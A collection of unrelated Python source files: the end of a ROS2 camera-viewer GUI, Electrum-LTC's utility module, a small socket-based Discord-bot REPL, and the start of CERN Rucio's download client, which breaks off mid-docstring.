self.bridge = CvBridge() #建立cvbridge物件
msg_type = Image # subscription的訊息格式
name = "image_raw/uncompressed" # subscription的名子
sub = self.create_subscription(msg_type,name,self.listener_callback,10) #建立一個subscription
self.data = None # 用來存放節點收到的訊息
self.img = None # 用來存放訊息轉換成影像後的值
self.t1 = time.time() # 用來存放時間
self.delay = 0 # 用來存放時間延遲的值
self.fps = 0 # 用來存放fps值
sub # 執行subscription
def listener_callback(self, data):
self.data = data # 將data放到self.data
self.delay = round((time.time()-self.t1)*1000,2) # 計算延遲的時間
self.fps = int(1/(time.time()-self.t1)) #計算fps值
self.t1 = time.time() # 更新上次回傳的時間值
def get_frames(self):
try:
if self.count_publishers("/image_raw/compressed") and self.data != None: # 當網域中沒有名為/image_raw/compressed的publisher和self.data為空的時候
self.img = self.bridge.imgmsg_to_cv2(self.data, "bgr8") # 將self.data透過cvbridge轉換成影像存放在self.img
else:
self.img = np.random.randint(255, size=(640,480,3),dtype=np.uint8) #產生雜訊畫面
return self.img
except CvBridgeError as e:
print(e)
except KeyboardInterrupt:
sys.exit()
def main():
app = QtWidgets.QApplication([])
window = MainWindow()
window.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'LTC':8, 'mLTC':5, 'uLTC':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['LTC', 'mLTC', 'uLTC', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " LTC"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_ltc.electrum_ltc'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-ltc'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-ltc")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-LTC")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-LTC")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Bchain.info': ('https://bchain.info/',
{'tx': 'LTC/tx/', 'addr': 'LTC/addr/'}),
'BlockCypher.com': ('https://live.blockcypher.com/ltc/',
{'tx': 'tx/', 'addr': 'address/'}),
'explorer.litecoin.net': ('http://explorer.litecoin.net/',
{'tx': 'tx/', 'addr': 'address/'}),
'LiteCore': ('https://insight.litecore.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'SoChain': ('https://chain.so/',
{'tx': 'tx/LTC/', 'addr': 'address/LTC/'}),
'system default': ('blockchain://12a765e31ffd4059bada1e25190f6e98c99d9714d334efa41a195a7e7e04bfe2/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'LiteCore': ('https://testnet.litecore.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'SoChain': ('https://chain.so/',
{'tx': 'tx/LTCTEST/', 'addr': 'address/LTCTEST/'}),
'system default': ('blockchain://4966625a4b2851d9fdee139e56211a0d88575f59ed816ff5e6a63deb4e3e29a0/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'LiteCore')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a Litecoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'litecoin':
raise Exception("Not a litecoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid Litecoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='litecoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
|
repl.py
|
import inspect
import itertools
import socket
import threading
from src.config import bc
from src.log import log
REPL_HOST = ''
class REPLCommands:
@staticmethod
def help(message):
commands = [func[0] for func in inspect.getmembers(REPLCommands, inspect.isfunction)
if not func[0].startswith('_')]
return ', '.join(commands)
@staticmethod
def ping(message):
return "Pong!"
@staticmethod
def channels(message):
guilds = ((channel.id, channel.name) for channel in
itertools.chain.from_iterable(guild.text_channels for guild in bc.guilds))
result = ""
for guild in guilds:
result += f"{guild[0]} -> {guild[1]}\n"
return result
class Repl:
def __init__(self, port) -> None:
self.channel = None
self.sock = None
self.port = port
thread = threading.Thread(target=self.start)
thread.setDaemon(True)
thread.start()
def parse_command(self, message) -> str:
message = message.split(' ')
commands = [func[0] for func in inspect.getmembers(REPLCommands, inspect.isfunction)
if not func[0].startswith('_')]
if message[0] in commands:
return getattr(REPLCommands, message[0])(message).strip() + '\n'
return "\n"
def start(self) -> None:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR or socket.SO_REUSEPORT, 1)
self.sock.bind((REPL_HOST, self.port))
self.sock.listen()
while True:
log.debug(f"REPL initialized on port {self.port}")
try:
conn, addr = self.sock.accept()
with conn:
log.debug(f"Connected by {addr}")
while True:
conn.send("> ".encode("utf-8"))
data = conn.recv(1024)
if not data:
break
conn.send(self.parse_command(data.decode("utf-8").strip()).encode("utf-8"))
except OSError as e:
log.warning(f"REPL: {e}")
def stop(self):
if self.sock:
self.sock.close()
|
downloadclient.py
|
# Copyright 2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Tomas Javurek <tomasjavurek09@gmail.com>, 2018
# - Vincent Garonne <vgaronne@gmail.com>, 2018
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2018
# - Nicolo Magini <nicolo.magini@cern.ch>, 2018-2019
# - Tobias Wegner <tobias.wegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
#
# PY3K COMPATIBLE
from __future__ import division
import copy
import logging
import os
import random
import shutil
import signal
import time
try:
from Queue import Queue, Empty, deque
except ImportError:
from queue import Queue, Empty, deque
from threading import Thread
from rucio.client.client import Client
from rucio.common.exception import (InputValidationError, NoFilesDownloaded, NotAllFilesDownloaded, RucioException)
from rucio.common.pcache import Pcache
from rucio.common.utils import adler32, md5, detect_client_location, generate_uuid, parse_replicas_from_string, send_trace, sizefmt, execute, parse_replicas_from_file
from rucio.rse import rsemanager as rsemgr
from rucio import version
class BaseExtractionTool:
def __init__(self, program_name, useability_check_args, extract_args, logger):
"""
Initialises a extraction tool object
:param program_name: the name of the archive extraction program, e.g., unzip
:param useability_check_args: the arguments of the extraction program to test if its installed, e.g., --version
:param extract_args: the arguments that will be passed to the program for extraction
:param logger: logging.Logger object
"""
self.program_name = program_name
self.useability_check_args = useability_check_args
self.extract_args = extract_args
self.logger = logger
self.is_useable_result = None
def is_useable(self):
"""
Checks if the extraction tool is installed and usable
:returns: True if it is usable otherwise False
"""
if self.is_useable_result is not None:
return self.is_useable_result
self.is_usable_result = False
cmd = '%s %s' % (self.program_name, self.useability_check_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger.debug('"%s" returned with exitcode %d' % (cmd, exitcode))
self.is_usable_result = (exitcode == 0)
except Exception as error:
self.logger.debug('Failed to execute: "%s"' % exitcode)
self.logger.debug(error)
return self.is_usable_result
def try_extraction(self, archive_file_path, file_to_extract, dest_dir_path):
"""
Calls the extraction program to extract a file from an archive
:param archive_file_path: path to the archive
:param file_to_extract: file name to extract from the archive
:param dest_dir_path: destination directory where the extracted file will be stored
:returns: True on success otherwise False
"""
if not self.is_useable():
return False
args_map = {'archive_file_path': archive_file_path,
'file_to_extract': file_to_extract,
'dest_dir_path': dest_dir_path}
extract_args = self.extract_args % args_map
cmd = '%s %s' % (self.program_name, extract_args)
try:
exitcode, out, err = execute(cmd)
exitcode = int(exitcode)
self.logger.debug('"%s" returned with exitcode %d' % (cmd, exitcode))
return (exitcode == 0)
except Exception as error:
self.logger.debug('Failed to execute: "%s"' % exitcode)
self.logger.debug(error)
return False
class DownloadClient:
def __init__(self, client=None, logger=None, tracing=True, check_admin=False, check_pcache=False):
"""
Initialises the basic settings for an DownloadClient object
:param client: Optional: rucio.client.client.Client object. If None, a new object will be created.
:param external_traces: Optional: reference to a list where traces can be added
:param logger: Optional: logging.Logger object to use for downloads. If None nothing will be logged.
"""
if not logger:
logger = logging.getLogger('%s.null' % __name__)
logger.disabled = True
self.check_pcache = check_pcache
self.logger = logger
self.tracing = tracing
if not self.tracing:
logger.debug('Tracing is turned off.')
self.is_human_readable = True
self.client = client if client else Client()
self.client_location = detect_client_location()
self.is_tape_excluded = True
self.is_admin = False
if check_admin:
account_attributes = list(self.client.list_account_attributes(self.client.account))
for attr in account_attributes[0]:
if attr['key'] == 'admin':
self.is_admin = attr['value'] is True
break
if self.is_admin:
self.is_tape_excluded = False
logger.debug('Admin mode enabled')
self.trace_tpl = {}
self.trace_tpl['hostname'] = self.client_location['fqdn']
self.trace_tpl['localSite'] = self.client_location['site']
self.trace_tpl['account'] = self.client.account
self.trace_tpl['eventType'] = 'download'
self.trace_tpl['eventVersion'] = 'api_%s' % version.RUCIO_VERSION[0]
self.use_cea_threshold = 10
self.extraction_tools = []
# unzip <archive_file_path> <did_name> -d <dest_dir_path>
extract_args = '%(archive_file_path)s %(file_to_extract)s -d %(dest_dir_path)s'
self.extraction_tools.append(BaseExtractionTool('unzip', '-v', extract_args, logger))
# tar -C <dest_dir_path> -xf <archive_file_path> <did_name>
extract_args = '-C %(dest_dir_path)s -xf %(archive_file_path)s %(file_to_extract)s'
self.extraction_tools.append(BaseExtractionTool('tar', '--version', extract_args, logger))
def download_pfns(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None):
"""
Download items with a given PFN. This function can only download files, no datasets.
:param items: List of dictionaries. Each dictionary describing a file to download. Keys:
pfn - PFN string of this file
did - DID string of this file (e.g. 'scope:file.name'). Wildcards are not allowed
rse - rse name (e.g. 'CERN-PROD_DATADISK'). RSE Expressions are not allowed
base_dir - Optional: Base directory where the downloaded files will be stored. (Default: '.')
no_subdir - Optional: If true, files are written directly into base_dir and existing files are overwritten. (Default: False)
ignore_checksum - Optional: If true, the checksum validation is skipped (for pfn downloads the checksum must be given explicitly). (Default: True)
transfer_timeout - Optional: Timeout time for the download protocols. (Default: None)
:param num_threads: Suggestion of number of threads to use for the download. It will be lowered if it's too high.
:param trace_custom_fields: Custom key value pairs to send with the traces
:param traces_copy_out: reference to an external list, where the traces should be uploaded
:returns: a list of dictionaries with an entry for each file, containing the input options, the did, and the clientState
clientState can be one of the following: ALREADY_DONE, DONE, FILE_NOT_FOUND, FAIL_VALIDATE, FAILED
:raises InputValidationError: if one of the input items is in the wrong format
:raises NoFilesDownloaded: if no files could be downloaded
:raises NotAllFilesDownloaded: if not all files could be downloaded
:raises RucioException: if something unexpected went wrong during the download
"""
logger = self.logger
trace_custom_fields['uuid'] = generate_uuid()
logger.info('Processing %d item(s) for input' % len(items))
input_items = []
for item in items:
did_str = item.get('did')
pfn = item.get('pfn')
rse = item.get('rse')
if not did_str or not pfn or not rse:
logger.debug(item)
raise InputValidationError('The keys did, pfn, and rse are mandatory')
logger.debug('Preparing PFN download of %s (%s) from %s' % (did_str, pfn, rse))
if '*' in did_str:
logger.debug(did_str)
raise InputValidationError('Cannot use PFN download with wildcard in DID')
did_scope, did_name = self._split_did_str(did_str)
dest_dir_path = self._prepare_dest_dir(item.get('base_dir', '.'),
did_scope, did_name,
item.get('no_subdir'))
item['scope'] = did_scope
item['name'] = did_name
item['sources'] = [{'pfn': pfn, 'rse': rse}]
dest_file_path = os.path.join(dest_dir_path, did_name)
item['dest_file_paths'] = [dest_file_path]
item['temp_file_path'] = '%s.part' % dest_file_path
options = item.setdefault('merged_options', {})
options.setdefault('ignore_checksum', item.pop('ignore_checksum', True))
options.setdefault('transfer_timeout', item.pop('transfer_timeout', None))
input_items.append(item)
num_files_in = len(input_items)
output_items = self._download_multithreaded(input_items, num_threads, trace_custom_fields, traces_copy_out)
num_files_out = len(output_items)
if num_files_in != num_files_out:
raise RucioException('%d items were in the input queue but only %d are in the output queue' % (num_files_in, num_files_out))
return self._check_output(output_items)
def download_dids(self, items, num_threads=2, trace_custom_fields={}, traces_copy_out=None):
"""
Download items with given DIDs. This function can also download datasets and wildcarded DIDs.
:param items: List of dictionaries. Each dictionary describing an item to download. Keys:
did - DID string of this file (e.g. 'scope:file.name')
filters - Filter to select DIDs for download. Optional if DID is given
